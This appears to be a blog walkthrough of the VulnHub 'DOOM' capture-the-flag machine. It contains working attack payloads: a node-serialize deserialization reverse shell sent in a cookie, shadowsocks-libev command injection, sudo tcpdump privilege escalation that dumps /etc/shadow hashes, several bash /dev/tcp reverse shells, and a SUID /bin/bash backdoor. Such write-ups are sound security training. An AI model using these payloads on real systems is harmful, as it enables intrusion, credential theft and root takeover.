DOOM -VULNHUB- Linux
Complete walkthrough, of the season content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We ane going to use arp-scan tool in order to discover the target machine this software send request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol as you can see below:
NMAP:
On this step, from the attacker machine we recover information about the open ports and services of the target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.
nmap -sC -sV -v -n -T4 -p - 192.168.1.43 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 19:56 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating Ping Scan at 19:56
Scanning 192.168.1.43 [2 ports]
Completed Ping Scan at 19:56, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:56
Scanning 192.168.1.43 [65535 ports]
Discovered open port 22/tcp on 192.168.1.43
Discovered open port 666/tcp on 192.168.1.43
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 66.67% done; ETC: 19:56 (0:00:01 remaining)
Completed Connect Scan at 19:56, 2.65s elapsed (65535 total ports)
Initiating Service scan at 19:56
Scanning 2 services on 192.168.1.43
Completed Service scan at 19:56, 11.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.43.
Initiating NSE at 19:56
Completed NSE at 19:56, 0.12s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Nmap scan report for 192.168.1.43
Host is up (0.00031s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
NSE: Script Post-scanning.
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.18 seconds
The conclusion of nmap scan is that we found the following open ports with the services:
EXPLOITATION:
22 ssh:
The OpenSSH service is enabled and active as you can see below :
Using the service name and version we are looking for an exploit with searchsploit tool:
kali@kali:~/VULNHUB/DOOM/nmap$ searchsploit OpenSSH 7.7
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
And with this exploit on python we can enumerate the users that system operative allow to connect on the target server:
666/tcp http :
Usinng whatweb we evaluate the target service:
whatweb http://192.168.1.43:666
http://192.168.1.43:666 [200 OK] Cookies[profile], Country[RESERVED][ZZ], HttpOnly[profile], IP[192.168.1.43], X-Powered-By[Express]
We access to the service from the browser:
As you can see below the server responded with a session cookie identifier: "profile"
kali@kali:~/VULNHUB/DOOM/exploits$ curl -X GET http://192.168.1.43:666 -v
Note: Unnecessary use of -X or --request, GET is already inferred.
* Trying 192.168.1.43:666...
* Connected to 192.168.1.43 (192.168.1.43) port 666 (#0)
> GET / HTTP/1.1
> Host: 192.168.1.43:666
> User-Agent: curl/7.72.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Set-Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D; Max-Age=900; Path=/; Expires=Thu, 02 Sep 2021 18:47:33 GMT; HttpOnly
< Content-Type: text/html; charset=utf-8
< Content-Length: 36
< ETag: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
< Date: Thu, 02 Sep 2021 18:32:33 GMT
< Connection: keep-alive
<
* Connection #0 to host 192.168.1.43 left intact
Under Construction, Come Back Later!
So interesting, we are going to review the cookie content:
echo "eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D" | base64 -d
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
If we change the cookie username parameter we found that the response of the server change for an error, that expose util information:
With the response data we understand a couple of things:
1. Exists an user directory with the webserver content page on:
/home/nodeadmin/.web/
and of course an linux operative system user name: nodeadmin
2. The microservice use Express node framework.
So looking for an error at internet and finally using the following post we understand, that the nodejs application use an vulnerable library: node-serialized
https://github.com/indrefi/Insecure-Deserialization-NodeJS-RCE
We install the library on attacker machine in order to understand the vulnerability:
kali@kali:~/VULNHUB/DOOM/exploits$ npm install node-serialize
added 1 package, and audited 2 packages in 2s
1 critical severity vulnerability
Some issues need review, and may require choosing
a different dependency.
Run `npm audit` for details.
kali@kali:~/VULNHUB/DOOM/exploits$ npm audit
# npm audit report
node-serialize *
Severity: critical
Code Execution through IIFE - https://npmjs.com/advisories/311
No fix available
node_modules/node-serialize
1 critical severity vulnerability
Some issues need review, and may require choosing
a different dependency.
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
At this point with the following payload modified for our vulnerable variable: username
{"username":"_$$ND_FUNC$$_function(){\n\tvar HOST = \"192.168.1.34\";\n\tvar PORT = 1337;\n var net = require(\"net\"),\n cp = require(\"child_process\"),\n sh = cp.spawn(\"/bin/bash\", []);\n var client = new net.Socket();\n client.connect(PORT, HOST, function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return /a/; // Prevents the Node.js application form crashing\n}"}
eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe1xuXHR2YXIgSE9TVCA9IFwiMTkyLjE2OC4xLjM0XCI7XG5cdHZhciBQT1JUID0gMTMzNztcbiAgICB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSxcbiAgICAgICAgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSxcbiAgICAgICAgc2ggPSBjcC5zcGF3bihcIi9iaW4vYmFzaFwiLCBbXSk7XG4gICAgdmFyIGNsaWVudCA9IG5ldyBuZXQuU29ja2V0KCk7XG4gICAgY2xpZW50LmNvbm5lY3QoUE9SVCwgSE9TVCwgZnVuY3Rpb24oKXtcbiAgICAgICAgY2xpZW50LnBpcGUoc2guc3RkaW4pO1xuICAgICAgICBzaC5zdGRvdXQucGlwZShjbGllbnQpO1xuICAgICAgICBzaC5zdGRlcnIucGlwZShjbGllbnQpO1xuICAgIH0pO1xuICAgIHJldHVybiAvYS87IC8vIFByZXZlbnRzIHRoZSBOb2RlLmpzIGFwcGxpY2F0aW9uIGZvcm0gY3Jhc2hpbmdcbn0ifQ==
And we exploit the RCE vulnerability on the target server:
And after several attempts finally we got a reverse shell using RCE by deserialization cookie param:
Payload :
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('/bin/bash -i >& /dev/tcp/192.168.1.34/9898 0>&1',(e,out,err)=>{console.log(out);}); }()"}
(on Base64 encoding)
Execute:
Reverse Shell:
PRIVILEGE ESCALATION:
After review information at internet about this process executed with setuid by the user fireman:
[nodeadmin@localhost tmp]$ ps aux | grep fireman
ps aux | grep fireman
root 849 0.0 0.1 301464 4496 ? S 14:22 0:00 su fireman -c /usr/local/bin/ss-manager
fireman 857 0.0 0.0 37072 3940 ? Ss 14:22 0:00 /usr/local/bin/ss-manager
nodeadm+ 1097 0.0 0.0 213788 1024 ? S 14:30 0:00 grep --color=auto fireman
We found that has a vulnerable library "shadowsocks-libev", the information and PoC is on the following link:
https://github.com/shadowsocks/shadowsocks-libev/issues/1734
Execution:
[nodeadmin@localhost ~]$ nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}nc -u 127.0.0.1 8839
ok
And we evaluate successfully of the PoC execution:
nodeadmin@localhost tmp]$ ls -ltrh
ls -ltrh
total 0
drwx------ 3 root root 60 Sep 3 14:22 systemd-private-edfab2bed0bd42bd917fc5f11223c8dc-rtkit-daemon.service-Joaoj3
drwx------ 3 root root 60 Sep 3 14:22 systemd-private-edfab2bed0bd42bd917fc5f11223c8dc-chronyd.service-zrlz3y
-rw------- 1 fireman fireman 0 Sep 3 14:29 evil
In that case we can spawn a terminal with fireman user privileges, with the same PoC using the spawn reverse shell command instead o create a temporal file:
[nodeadmin@localhost tmp]$ nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"|| /bin/bash -i >& /dev/tcp/192.168.1.34/9999 0>&1 ||"}nc -u 127.0.0.1 8839
And of course , we are in right:
And finally with fireman user bash console we found that can execute different commands without sudo privileges:
[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
One of them tcpdum, if you know how let you obtain a bash sheel with sudo privileges, as you can see at GTFObins:
https://gtfobins.github.io/gtfobins/tcpdump/#sudo
Obtain data for shadow "privilege escalation test":
sh-4.4$ echo $'id\ncat /etc/shadow' > /tmp/.test
echo $'id\ncat /etc/shadow' > /tmp/.test
sh-4.4$ chmod +x /tmp/.test
chmod +x /tmp/.test
sh-4.4$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
11 packets received by filter
0 packets dropped by kernel
sh-4.4$ uid=0(root) gid=0(root) groups=0(root)
root:$6$jA85omnRVznNFM4j$voN29bYWJUlRbxgsqia46oC9IK/mdRK5B.IYUrJYs196sfA3ye3rSV790EoD76ABKu29CdtnAXQtIAo6OpNWc1:17681:0:99999:7:::
bin:*:17589:0:99999:7:::
daemon:*:17589:0:99999:7:::
adm:*:17589:0:99999:7:::
lp:*:17589:0:99999:7:::
sync:*:17589:0:99999:7:::
shutdown:*:17589:0:99999:7:::
halt:*:17589:0:99999:7:::
mail:*:17589:0:99999:7:::
operator:*:17589:0:99999:7:::
games:*:17589:0:99999:7:::
ftp:*:17589:0:99999:7:::
nobody:*:17589:0:99999:7:::
apache:!!:17646::::::
systemd-coredump:!!:17646::::::
systemd-network:!!:17646::::::
systemd-resolve:!!:17646::::::
dbus:!!:17646::::::
polkitd:!!:17646::::::
geoclue:!!:17646::::::
colord:!!:17646::::::
rtkit:!!:17646::::::
pulse:!!:17646::::::
gluster:!!:17646::::::
qemu:!!:17646::::::
avahi:!!:17646::::::
chrony:!!:17646::::::
dnsmasq:!!:17646::::::
rpc:!!:17646:0:99999:7:::
usbmuxd:!!:17646::::::
openvpn:!!:17646::::::
radvd:!!:17646::::::
saslauth:!!:17646::::::
nm-openvpn:!!:17646::::::
nm-openconnect:!!:17646::::::
abrt:!!:17646::::::
pipewire:!!:17646::::::
gdm:!!:17646::::::
rpcuser:!!:17646::::::
gnome-initial-setup:!!:17646::::::
vboxadd:!!:17646::::::
sshd:!!:17646::::::
tss:!!:17646::::::
tcpdump:!!:17646::::::
nginx:!!:17681::::::
mysql:!!:17681::::::
squid:!!:17681::::::
webalizer:!!:17681::::::
nodeadmin:$6$Irn2hnRs4FOa48.v$qMv9vxJJvG7IPAXrRLk95mwSst03RQ3.5AbZYHHQvt9Ly0.mBAsRG8NVbl/mjFvFHoAwh2lyFt4fU.SlVGBDH0:17681:0:99999:7:::
fireman:$6$BaIbY56JYCpGwJbh$/i8xxjqRpl72vhmw5zCzjdHtGt.0oq0S5f76c3YKFGBFciShcjlA.04rXZo3XhPd3SDiZw2djhaSAsdnz/./d.:17683:0:99999:7:::
Using the same procedure we can obtain the CTF final flag:
sh-4.4$ echo $'ls /root\ncat /root/*' > /tmp/.test
echo $'ls /root\ncat /root/*' > /tmp/.test
sh-4.4$ chmod +x /tmp/.test
chmod +x /tmp/.test
sh-4.4$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
And why not? obtain an interactive shell.
But after connection, the original process don't wait for response and could not be interactive :
echo $'/bin/bash -i >& /dev/tcp/192.168.1.34/9990 0>&1\ncat /root/*' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
kali@kali:~$ nc -nvlp 9990
listening on [any] 9990 ...
connect to [192.168.1.34] from (UNKNOWN) [192.168.1.43] 59476
whoami
id
In that case we can change suid permission and owner of /bin/bash Terminal shell in operating system using the same procedure:
echo $'chown root:root /bin/bash\nchmod +s /bin/bash\nls -ltrh /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
And exploit the misconfiguration with the following command:
/bin/bash -p
No comments:
Post a Comment